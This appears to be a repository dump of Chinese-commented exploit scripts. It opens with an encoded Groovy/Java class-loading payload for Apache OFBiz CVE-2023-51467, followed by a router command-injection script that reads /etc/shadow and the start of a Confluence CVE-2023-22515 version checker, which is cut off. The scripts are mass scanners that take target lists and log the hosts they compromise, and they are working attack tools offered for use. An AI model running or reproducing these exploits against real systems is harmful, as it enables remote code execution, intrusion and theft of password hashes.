\u0041\u0070\u004f\u0068\u0049\u005a\u0045\u0068\u0049\u0078\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0078\u0054\u0074\u0067\u0041\u0074\u0047\u0052\u0049\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u005a\u0045\u0046\u004f\u0032\u0041\u0042\u0038\u0036\u0043\u0052\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0034\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u005a\u0045\u006c\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u004a\u0055\u0037\u0059\u0041\u0048\u0031\u0065\u006e\u0041\u0041\u0036\u006e\u0041\u0041\u0055\u0036\u0043\u0049\u0051\u0047\u0041\u0061\u0066\u0039\u0070\u0037\u0045\u0041\u0042\u0077\u0043\u0067\u0041\u004b\u0073\u0041\u0072\u0067\u0041\u0053\u0041\u004d\u0034\u0041\u0033\u0041\u0044\u0066\u0041\u0042\u0049\u0042\u0078\u0041\u0049\u0077\u0041\u006a\u004d\u0041\u004c\u0077\u0041\u002f\u0041\u0045\u0051\u0043\u0068\u0051\u0041\u0076\u0041\u0045\u0063\u0041\u0059\u0067\u004b\u0046\u0041\u0043\u0038\u0041\u005a\u0051\u0043\u0046\u0041\u006f\u0055\u0041\u004c\u0077\u0043\u0049\u0041\u006e\u0038\u0043\u0068\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u004e\u0034\u0041\u004e\u0077\u0041\u0041\u0041\u0042\u0055\u0041\u0042\u0041\u0041\u0057\u0041\u0041\u0073\u0041\u0046\u0077\u0041\u0056\u0041\u0042\u0067\u0041\u0047\u0067\u0041\u005a\u0041\u0043\u0059\u0041\u0047\u0077\u0041\u002f\u0041\u0042\u0030\u0041\u0052\u0077\u0041\u0065\u0041\u0045\u0034\u0041\u0048\u0077\u0042\u006c\u0041\u0043\u0041\u0041\u0063\u0041\u0041\u0068\u0041\u0048\u0055\u0041\u0049\u0067\u0042\u0039\u0041\u0043\u004d\u0041\u0069\u0041\u0041\u006b\u0041\u004a\u004d\u0041\u004a\u0051\u0043\u0059\u0041\u0043\u0059\u0041\u006f\u0041\u0041\u006f\u0041\u004b\u0073\u0041\u004b\u0077\u0043\u0075\u0041\u0043\u006b\u0041\u0073\u0041\u0041\u0071\u0041\u004d\u0045\u0041\u004c\u0041\u0044\u0047\u0041\u0043\u0030\u0041\u007a\u0067\u0041\u0076\u0041\u004e\u0077\u0041\u004d\u0067\u0044\u0066\u0041\u0044\u0041\u0041\u0034\u0051\u0041\u0078\u0041\u004f\u0077\u0041\u004d\u0077\u0044\u0078\u0041\u0044\u0051\u0041\u002b\u0051\u0041\u0031\u0041\u0051\u0051\u0041\u004e\u0067\u0045\u004a\u0041\u0044\u0063\u0042\u0046\u0077\u0041\u0034\u0041\u0054\u004d\u0041\u004f\u0051\u0045\u002b\u0041\u0044\u006f\u0042\u0051\u0077\u0041\u0037\u0041\u0055\u0073\u0041\u0050\u0041\u0046\u006b\u0041\u0044\u0030\u0042\u0069\u0067\u0041\u002b\u0041\u0059\u0038\u0041\u0050\u0077\u0047\u0053\u0041\u0045\u0045\u0042\u006e\u0051\u0042\u0043\u0041\u0063\u0051\u0041\u0052\u0041\u0048\u004d\u0041\u0045\u0055\u0042\u0030\u0077\u0042\u0047\u0041\u0067\u0034\u0041\u0052\u0077\u0049\u0077\u0041\u0045\u0077\u0043\u004d\u0077\u0042\u0049\u0041\u006a\u0055\u0041\u0053\u0051\u0049\u0039\u0041\u0045\u006f\u0043\u0058\u0051\u0042\u004c\u0041\u006e\u0038\u0041\u0054\u0051\u004b\u0043\u0041\u0046\u0045\u0043\u0068\u0051\u0042\u0050\u0041\u006f\u0063\u0041\u0047\u0077\u004b\u004e\u0041\u0046\u004d\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0067\u0043\u0058\u0041\u0041\u004d\u0041\u006b\u0077\u0041\u0041\u0041\u0044\u006b\u0041\u0041\u0067\u0041\u0044\u0041\u0041\u0041\u0041\u0045\u0053\u0075\u0034\u0041\u0044\u004b\u0077\u0054\u0062\u0067\u0041\u0041\u0072\u0059\u0041\u004e\u0043\u0075\u0032\u0041\u0044\u0057\u0077\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0045\u0041\u0041\u0055\u0041\u004d\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0041\u004f\u0041\u0041\u004d\u0041\u0041\u0041\u0042\u0064\u0041\u0041\u0055\u0041\u0058\u0067\u0041\u0047\u0041\u0046\u0038\u0041\u006c\u0051\u0041\u0041\u0041\u0041\u0051\u0041\u0041\u0051\u0041\u007a\u0041\u004a\u0067\u0041\u0041\u0041\u0041\u0043\u0041\u004a\u006b\u0041\u0041\u0051\u0043\u0061\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u002f\u0077\u0041\u0045\u0041\u0041\u0051\u0041\u0041\u0041\u0043\u0062\u004b\u0038\u0059\u0041\u0044\u0042\u0049\u0032\u004b\u0037\u0059\u0041\u004e\u0035\u006b\u0041\u0042\u0068\u0049\u0034\u0073\u0043\u0075\u0032\u0041\u0044\u006c\u004d\u004b\u0078\u0049\u0036\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u0037\u004b\u0069\u0075\u0033\u0041\u0044\u0077\u0053\u0050\u0062\u0059\u0041\u0050\u006b\u0030\u0073\u0076\u0067\u0057\u0066\u0041\u0041\u0059\u0053\u0050\u0037\u0041\u0071\u004c\u0041\u004d\u0079\u0074\u0051\u0042\u0041\u004b\u0069\u0077\u0045\u004d\u0072\u0067\u0041\u0051\u0062\u0067\u0041\u004a\u0037\u0055\u0041\u0051\u0072\u0073\u0041\u0051\u0031\u006b\u0071\u0074\u0077\u0042\u0045\u0054\u0069\u0032\u0032\u0041\u0045\u0055\u0053\u0052\u0072\u0041\u0072\u0045\u006b\u0065\u0032\u0041\u0044\u0075\u005a\u0041\u0043\u0049\u0071\u004b\u0037\u0063\u0041\u0050\u0042\u0049\u0039\u0074\u0067\u0041\u002b\u0054\u0053\u0079\u002b\u0042\u005a\u0038\u0041\u0042\u0068\u004a\u0049\u0073\u0043\u006f\u0073\u0041\u007a\u0049\u0073\u0042\u0044\u004b\u0032\u0041\u0045\u006d\u0077\u004b\u0078\u004a\u004b\u0074\u0067\u0041\u0037\u006d\u0051\u0041\u004e\u004b\u0069\u006f\u0072\u0074\u0077\u0041\u0038\u0074\u0067\u0042\u004c\u0073\u0043\u006f\u0071\u004b\u0037\u0063\u0041\u0050\u004c\u0059\u0041\u0053\u0037\u0041\u0041\u0041\u0041\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0053\u0041\u0042\u0051\u0041\u0041\u0041\u0042\u0070\u0041\u0041\u0030\u0041\u0061\u0067\u0041\u0051\u0041\u0047\u0077\u0041\u0046\u0051\u0042\u0074\u0041\u0042\u0034\u0041\u0062\u0077\u0041\u0070\u0041\u0048\u0041\u0041\u004c\u0077\u0042\u0078\u0041\u0044\u0049\u0041\u0063\u0077\u0041\u0035\u0041\u0048\u0051\u0041\u0052\u0067\u0042\u0031\u0041\u0045\u0038\u0041\u0064\u0067\u0042\u0054\u0041\u0048\u0063\u0041\u0056\u0067\u0042\u0034\u0041\u0046\u0038\u0041\u0065\u0051\u0042\u0071\u0041\u0048\u006f\u0041\u0063\u0041\u0042\u0037\u0041\u0048\u004d\u0041\u0066\u0051\u0042\u002b\u0041\u0048\u0034\u0041\u0068\u0077\u0042\u002f\u0041\u004a\u0045\u0041\u0067\u0051\u0041\u0042\u0041\u004a\u0077\u0041\u006e\u0051\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0042\u0032\u0041\u0041\u004d\u0041\u0042\u0051\u0041\u0041\u0041\u0044\u0061\u0037\u0041\u0045\u0078\u005a\u004b\u0037\u0063\u0041\u0054\u0055\u0036\u0037\u0041\u0045\u0035\u005a\u004c\u0062\u0063\u0041\u0054\u007a\u006f\u0045\u0047\u0051\u0051\u0073\u0075\u0041\u0042\u0051\u0074\u0067\u0042\u0052\u0047\u0051\u0053\u0032\u0041\u0046\u0049\u005a\u0042\u004c\u0059\u0041\u0055\u0036\u0063\u0041\u0043\u007a\u006f\u0045\u0047\u0051\u0053\u0032\u0041\u0046\u0053\u0077\u004c\u0062\u0059\u0041\u0056\u0062\u0041\u0041\u0041\u0051\u0041\u004a\u0041\u0043\u0059\u0041\u004b\u0051\u0041\u0076\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0043\u0059\u0041\u0043\u0051\u0041\u0041\u0041\u0049\u0077\u0041\u0043\u0051\u0043\u004f\u0041\u0042\u004d\u0041\u006a\u0077\u0041\u0063\u0041\u004a\u0041\u0041\u0049\u0051\u0043\u0052\u0041\u0043\u0059\u0041\u006c\u0041\u0041\u0070\u0041\u004a\u0049\u0041\u004b\u0077\u0043\u0054\u0041\u0044\u0045\u0041\u006c\u0051\u0041\u0043\u0041\u004a\u0034\u0041\u006d\u0077\u0041\u0042\u0041\u004a\u004d\u0041\u0041\u0041\u0041\u0076\u0041\u0041\u004d\u0041\u0041\u0067\u0041\u0041\u0041\u0042\u0063\u0072\u0045\u006a\u006f\u0053\u004e\u0072\u0059\u0041\u0056\u0068\u004a\u004b\u0045\u006a\u0061\u0032\u0041\u0046\u0059\u0053\u0052\u0078\u0049\u0032\u0074\u0067\u0042\u0057\u0073\u0041\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u0059\u0041\u0041\u0051\u0041\u0041\u0041\u004a\u0034\u0041\u0041\u0051\u0043\u0066\u0041\u004a\u0073\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0042\u0078\u0077\u0041\u0045\u0041\u0041\u006b\u0041\u0041\u0041\u0045\u006e\u0045\u006c\u0065\u0034\u0041\u0046\u0069\u0032\u0041\u0046\u006c\u004e\u004b\u0037\u0059\u0041\u004f\u0055\u0077\u0042\u0054\u0069\u0077\u0053\u0057\u0072\u0059\u0041\u0044\u004a\u006b\u0041\u0051\u0043\u0073\u0053\u0057\u0037\u0059\u0041\u0044\u004a\u006b\u0041\u0049\u0043\u0073\u0053\u0058\u004c\u0059\u0041\u0044\u004a\u006f\u0041\u0046\u0037\u0073\u0041\u0058\u0056\u006d\u0033\u0041\u0046\u0034\u0072\u0074\u0067\u0042\u0066\u0045\u006d\u0043\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0046\u004d\u0042\u0072\u0030\u0041\u0049\u0056\u006b\u0044\u0045\u0069\u004a\u0054\u0057\u0051\u0051\u0053\u0059\u006c\u004e\u005a\u0042\u0053\u0074\u0054\u004f\u0067\u0053\u006e\u0041\u0044\u0030\u0072\u0045\u006c\u0075\u0032\u0041\u0041\u0079\u005a\u0041\u0043\u0041\u0072\u0045\u006c\u0079\u0032\u0041\u0041\u0079\u0061\u0041\u0042\u0065\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u004b\u0037\u0059\u0041\u0058\u0078\u004a\u006a\u0074\u0067\u0042\u0066\u0074\u0067\u0042\u0068\u0054\u0041\u0061\u0039\u0041\u0043\u0046\u005a\u0041\u0078\u004a\u006b\u0055\u0031\u006b\u0045\u0045\u006d\u0056\u0054\u0057\u0051\u0055\u0072\u0055\u007a\u006f\u0045\u0075\u0041\u0042\u006d\u0047\u0051\u0053\u0032\u0041\u0047\u0064\u004f\u0075\u0077\u0042\u006f\u0057\u0053\u0032\u0032\u0041\u0047\u006d\u0033\u0041\u0047\u006f\u0053\u0061\u0037\u0059\u0041\u0062\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0047\u0032\u005a\u0041\u0041\u0073\u005a\u0042\u0062\u0059\u0041\u0062\u0071\u0063\u0041\u0042\u0052\u0049\u0032\u004f\u0067\u0061\u0037\u0041\u0047\u0068\u005a\u004c\u0062\u0059\u0041\u0062\u0037\u0063\u0041\u0061\u0068\u004a\u0072\u0074\u0067\u0042\u0073\u004f\u0067\u0057\u0037\u0041\u0046\u0031\u005a\u0074\u0077\u0042\u0065\u0047\u0051\u0061\u0032\u0041\u0046\u0038\u005a\u0042\u0062\u0059\u0041\u0062\u005a\u006b\u0041\u0043\u0078\u006b\u0046\u0074\u0067\u0042\u0075\u0070\u0077\u0041\u0046\u0045\u006a\u0061\u0032\u0041\u0046\u002b\u0032\u0041\u0047\u0045\u0036\u0042\u0068\u006b\u0047\u004f\u0067\u0063\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0048\u0073\u0044\u006f\u0046\u0047\u0051\u0057\u0032\u0041\u0046\u0051\u0036\u0042\u0069\u0033\u0047\u0041\u0041\u0063\u0074\u0074\u0067\u0042\u0077\u0047\u0051\u0061\u0077\u004f\u0067\u0067\u0074\u0078\u0067\u0041\u0048\u004c\u0062\u0059\u0041\u0063\u0042\u006b\u0049\u0076\u0077\u0041\u0045\u0041\u004a\u0041\u0041\u002b\u0077\u0045\u0047\u0041\u0043\u0038\u0041\u006b\u0041\u0044\u0037\u0041\u0052\u006f\u0041\u0041\u0041\u0045\u0047\u0041\u0051\u0038\u0042\u0047\u0067\u0041\u0041\u0041\u0052\u006f\u0042\u0048\u0041\u0045\u0061\u0041\u0041\u0041\u0041\u0041\u0051\u0043\u0055\u0041\u0041\u0041\u0041\u0062\u0067\u0041\u0062\u0041\u0041\u0041\u0041\u0070\u0077\u0041\u004a\u0041\u004b\u0067\u0041\u0044\u0067\u0043\u0070\u0041\u0042\u0041\u0041\u0071\u0077\u0041\u005a\u0041\u004b\u0077\u0041\u004b\u0077\u0043\u0074\u0041\u0044\u0038\u0041\u0072\u0077\u0042\u0057\u0041\u004c\u0045\u0041\u0061\u0041\u0043\u0079\u0041\u0048\u0077\u0041\u0074\u0041\u0043\u0051\u0041\u004c\u0063\u0041\u006d\u0051\u0043\u0034\u0041\u004b\u0073\u0041\u0075\u0051\u0043\u002f\u0041\u004c\u006f\u0041\u0030\u0051\u0043\u0037\u0041\u0050\u0063\u0041\u0076\u0041\u0044\u0037\u0041\u004d\u0041\u0041\u002f\u0077\u0044\u0042\u0041\u0051\u004d\u0041\u0076\u0041\u0045\u0047\u0041\u004c\u0030\u0042\u0043\u0041\u0043\u002b\u0041\u0051\u0038\u0041\u0077\u0041\u0045\u0054\u0041\u004d\u0045\u0042\u0046\u0077\u0043\u002b\u0041\u0052\u006f\u0041\u0077\u0041\u0045\u0067\u0041\u004d\u0045\u0042\u004a\u0041\u0044\u0044\u0041\u0041\u0045\u0041\u006f\u0041\u0043\u0068\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0056\u006b\u0041\u0042\u0041\u0041\u004d\u0041\u0041\u0041\u0041\u0079\u0052\u004a\u0058\u0075\u0041\u0042\u0059\u0074\u0067\u0042\u005a\u0045\u006c\u0071\u0032\u0041\u0041\u0079\u0061\u0041\u0041\u006b\u0053\u0063\u0055\u0036\u006e\u0041\u0041\u0059\u0053\u0063\u006b\u0036\u0034\u0041\u0047\u0059\u0074\u0074\u0067\u0042\u007a\u004f\u0067\u0053\u0037\u0041\u0048\u0052\u005a\u004b\u0078\u0079\u0033\u0041\u0048\u0055\u0036\u0042\u0052\u006b\u0045\u0074\u0067\u0042\u0070\u004f\u0067\u0059\u005a\u0042\u004c\u0059\u0041\u0062\u007a\u006f\u0048\u0047\u0051\u0057\u0032\u0041\u0048\u0059\u0036\u0043\u0042\u006b\u0045\u0074\u0067\u0042\u0033\u004f\u0067\u006b\u005a\u0042\u0062\u0059\u0041\u0065\u0044\u006f\u004b\u0047\u0051\u0057\u0032\u0041\u0048\u006d\u0061\u0041\u0047\u0041\u005a\u0042\u0072\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0061\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0042\u0037\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004b\u0047\u0051\u0065\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u004c\u0059\u0041\u0065\u0070\u0034\u0041\u0045\u0042\u006b\u004a\u0047\u0051\u0069\u0032\u0041\u0048\u0075\u0032\u0041\u0048\u0079\u006e\u002f\u002b\u0034\u005a\u0043\u0072\u0059\u0041\u0066\u0052\u006b\u004a\u0074\u0067\u0042\u0039\u0046\u0041\u0042\u002b\u0075\u0041\u0043\u0041\u0047\u0051\u0053\u0032\u0041\u0049\u0046\u0058\u0070\u0077\u0041\u0049\u004f\u0067\u0075\u006e\u002f\u0035\u0034\u005a\u0042\u004c\u0059\u0041\u0063\u0042\u006b\u0046\u0074\u0067\u0043\u0043\u0070\u0077\u0041\u004a\u0054\u0069\u0032\u0032\u0041\u0049\u004e\u0058\u0073\u0051\u0041\u0043\u0041\u004b\u0063\u0041\u0072\u0051\u0043\u0077\u0041\u0043\u0038\u0041\u0041\u0041\u0043\u002f\u0041\u004d\u0049\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0075\u0041\u0042\u0073\u0041\u0041\u0041\u0044\u0050\u0041\u0042\u0041\u0041\u0030\u0041\u0041\u0057\u0041\u004e\u0049\u0041\u0047\u0051\u0044\u0055\u0041\u0043\u0049\u0041\u0031\u0051\u0041\u0074\u0041\u004e\u0059\u0041\u0051\u0067\u0044\u0058\u0041\u0046\u0041\u0041\u0032\u0041\u0042\u0059\u0041\u004e\u006b\u0041\u0059\u0041\u0044\u0061\u0041\u0047\u0030\u0041\u0033\u0041\u0042\u0031\u0041\u004e\u0030\u0041\u0067\u0067\u0044\u0066\u0041\u0049\u006f\u0041\u0034\u0041\u0043\u0058\u0041\u004f\u0049\u0041\u006e\u0041\u0044\u006a\u0041\u004b\u0045\u0041\u0035\u0041\u0043\u006e\u0041\u004f\u0059\u0041\u0072\u0051\u0044\u006e\u0041\u004c\u0041\u0041\u0036\u0041\u0043\u0079\u0041\u004f\u006b\u0041\u0074\u0051\u0044\u0072\u0041\u004c\u006f\u0041\u0037\u0041\u0043\u002f\u0041\u004f\u0038\u0041\u0077\u0067\u0044\u0074\u0041\u004d\u004d\u0041\u0037\u0067\u0044\u0049\u0041\u0050\u0041\u0041\u0041\u0051\u0043\u0069\u0041\u004a\u0049\u0041\u0041\u0051\u0043\u0054\u0041\u0041\u0041\u0041\u004c\u0041\u0041\u0044\u0041\u0041\u0045\u0041\u0041\u0041\u0041\u0051\u004b\u0069\u0071\u0030\u0041\u0045\u0041\u0071\u0074\u0041\u0042\u0043\u0074\u0067\u0043\u0045\u0074\u0067\u0043\u0046\u0073\u0051\u0041\u0041\u0041\u0041\u0045\u0041\u006c\u0041\u0041\u0041\u0041\u0041\u006f\u0041\u0041\u0067\u0041\u0041\u0041\u0050\u0051\u0041\u0044\u0077\u0044\u0031\u0041\u0041\u006b\u0041\u006f\u0077\u0043\u006b\u0041\u0041\u0045\u0041\u006b\u0077\u0041\u0041\u0041\u0052\u0077\u0041\u0042\u0067\u0041\u0045\u0041\u0041\u0041\u0041\u0072\u0041\u0046\u004d\u0045\u006f\u0061\u0034\u0041\u0044\u004a\u004e\u004c\u0042\u004b\u0048\u0042\u004c\u0030\u0041\u0048\u0046\u006b\u0044\u0045\u0069\u0046\u0054\u0074\u0067\u0041\u0064\u004c\u004c\u0059\u0041\u004b\u0067\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0079\u0070\u0054\u0074\u0067\u0041\u0066\u0077\u0041\u0041\u0073\u0077\u0041\u0041\u0073\u0054\u004b\u0063\u0041\u0042\u0045\u0030\u0072\u0078\u0077\u0042\u0044\u0045\u006f\u0069\u0034\u0041\u0044\u0049\u0053\u0069\u0051\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u0042\u0041\u0037\u0030\u0041\u0048\u0072\u0059\u0041\u0048\u0030\u0030\u0073\u0074\u0067\u0041\u0045\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u0073\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u004b\u006c\u004f\u0032\u0041\u0042\u002f\u0041\u0041\u0043\u007a\u0041\u0041\u0043\u0078\u004d\u0070\u0077\u0041\u0045\u0054\u0053\u0076\u0048\u0041\u0044\u0051\u0053\u0069\u0037\u0067\u0041\u004d\u006b\u0030\u0073\u0045\u006f\u006f\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0031\u004f\u004c\u0053\u0079\u0032\u0041\u0043\u006f\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0071\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u004c\u004d\u0041\u0041\u004c\u0045\u0079\u006e\u0041\u0041\u0052\u004e\u004b\u0037\u0041\u0041\u0041\u0077\u0041\u0043\u0041\u0043\u0030\u0041\u004d\u0041\u0041\u0076\u0041\u0044\u0055\u0041\u0063\u0051\u0042\u0030\u0041\u0043\u0038\u0041\u0065\u0051\u0043\u006d\u0041\u004b\u006b\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0047\u0041\u0042\u0045\u0041\u0041\u0041\u0044\u0039\u0041\u0041\u0049\u0041\u002f\u0077\u0041\u0049\u0041\u0051\u0041\u0041\u004c\u0051\u0045\u0044\u0041\u0044\u0041\u0042\u0041\u0051\u0041\u0078\u0041\u0051\u0051\u0041\u004e\u0051\u0045\u0047\u0041\u0045\u0077\u0042\u0042\u0077\u0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b"}
18 |
19 | res = requests.post(vulnurl, headers=headers, data=payload, verify=False, timeout=30)
20 | res.encoding = "utf-8"
21 | if res.status_code == 200 and "uid=" in res.text:
22 | print(f"目标URL: {url} ")
23 | with open(success_file, 'a') as s_file:
24 | s_file.write("=" * 65 + "\n")
25 | s_file.write(f"目标URL: {url}\n")
26 | s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0]))
27 | return True
28 | except Exception as e:
29 | print(f"发生异常:{e}")
30 | return False
31 |
32 | def scan_targets(targets, proxies=None, success_file=None):
33 | for target in targets:
34 | target = target.strip()
35 | check_for_vulnerability(target, proxies, success_file)
36 |
37 | def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
38 | threads = []
39 |
40 | for i in range(num_threads):
41 | thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
42 | threads.append(thread)
43 |
44 | for thread in threads:
45 | thread.start()
46 |
47 | for thread in threads:
48 | thread.join()
49 |
50 | if __name__ == '__main__':
51 | parser = argparse.ArgumentParser(description="Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467")
52 | parser.add_argument("-u", "--url", help="目标URL")
53 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
54 | parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
55 | parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
56 | args = parser.parse_args()
57 |
58 | if not args.url and not args.file:
59 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
60 | exit(1)
61 |
62 | if args.url:
63 | urls = [args.url]
64 | elif args.file:
65 | with open(args.file, 'r') as file:
66 | urls = file.readlines()
67 |
68 | success_file = 'success_targets.txt'
69 |
70 | proxies = {
71 | "http": args.proxy,
72 | "https": args.proxy
73 | } if args.proxy else None
74 |
75 | multi_threaded_scan(urls, proxies, success_file, args.threads)
76 |
77 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
78 |
--------------------------------------------------------------------------------
/Cellular_rce_exp.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-9-22
3 |
4 | import requests
5 | import argparse
6 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
7 |
8 | def check_for_vulnerability(url, proxies={}, success_file=None):
9 | headers = {
10 | 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
11 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
12 | 'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
13 | 'Accept-Encoding':'gzip, deflate',
14 | 'Upgrade-Insecure-Requests':'1',
15 | 'Sec-Fetch-Dest':'document',
16 | 'Sec-Fetch-Mode':'navigate',
17 | 'Sec-Fetch-Site':'none',
18 | 'Sec-Fetch-User':'?1',
19 | 'Te':'trailers',
20 | 'Connection':'close'
21 | }
22 | try:
23 | response = requests.get(url + '/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912', headers=headers, proxies=proxies, verify=False, timeout=30)
24 | if response.status_code == 200 and "root:" in response.text:
25 | with open(success_file, 'a') as s_file:
26 | s_file.write(f"++++++++++++++++++\n")
27 | s_file.write(f"目标URL: {url}\n")
28 | s_file.write(f"Payload: ping -c 4 1.1.1.1;cat /etc/shadow&v=0.1303033443137912\n")
29 | s_file.write(f"响应内容:\n{response.text}\n\n")
30 | return True
31 | except Exception as e:
32 | print(f"发生异常:{e}")
33 | return False
34 |
35 | def scan_targets(targets, proxies={}, success_file=None):
36 | for target in targets:
37 | target = target.strip()
38 | check_for_vulnerability(target, proxies, success_file)
39 |
40 | if __name__ == '__main__':
41 | parser = argparse.ArgumentParser(description="移动路由器 Cellular Router 命令执行漏洞")
42 | parser.add_argument("-u", "--url", help="目标URL")
43 | parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
44 | args = parser.parse_args()
45 |
46 | if not args.url and not args.file:
47 | print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
48 | exit(1)
49 |
50 | if args.url:
51 | urls = [args.url]
52 | elif args.file:
53 | with open(args.file, 'r') as file:
54 | urls = file.readlines()
55 |
56 | proxies = {
57 |
58 | }
59 | success_file = 'success_targets.txt'
60 |
61 | for url in urls:
62 | url = url.strip()
63 | scan_targets([url], proxies, success_file)
64 |
65 | print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
66 |
--------------------------------------------------------------------------------
/Confluence_CVE-2023-22515_Checker.py:
--------------------------------------------------------------------------------
1 | # 作者: VulnExpo
2 | # 日期: 2023-10-20
3 |
4 | import re
5 | import requests
6 | import argparse
7 | from urllib.parse import urlparse
8 | from requests.exceptions import RequestException
9 | requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
10 |
11 | def check_for_vulnerability(url, proxies={}, success_file=None):
12 | SERVER_INFO_URI = '/server-info.action'
13 | VULNERABLE_VERSIONS = ['8.0.0', '8.0.1', '8.0.2', '8.0.3', '8.0.4', '8.1.0', '8.1.1', '8.1.3', '8.1.4', '8.2.0', '8.2.1', '8.2.2', '8.2.3', '8.3.0', '8.3.1', '8.3.2', '8.4.0', '8.4.1', '8.4.2', '8.5.0', '8.5.1']
14 |
15 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'}
16 |
17 | try:
18 | response = requests.get(url, headers=headers, verify=False, timeout=5)
19 | response.raise_for_status()
20 | except RequestException as err:
21 | print(f"连接到 {url} 时出现错误: {err}")
22 | return
23 |
24 | if 'Atlassian Confluence' not in response.text:
25 | print(f"{url} - 目标似乎不是 Atlassian Confluence. 跳过此目标.")
26 | return
27 |
28 | version_match = re.search(r'Atlassian Confluence ([\d\.]+)<', response.text)
29 | if not version_match:
30 | version_match = re.search(r'"ajs-version-number" content="([\d\.]+)"', response.text)
31 |
32 | if version_match:
33 | version = version_match.group(1)
34 | product = 'Atlassian Confluence'
35 | else:
36 | version = 'unknown'
37 | product = 'unknown'
38 |
39 | initial_vuln_status = 'not vulnerable'
40 |
41 | if version != 'unknown' and version in VULNERABLE_VERSIONS:
42 | initial_vuln_status = "potentially vulnerable"
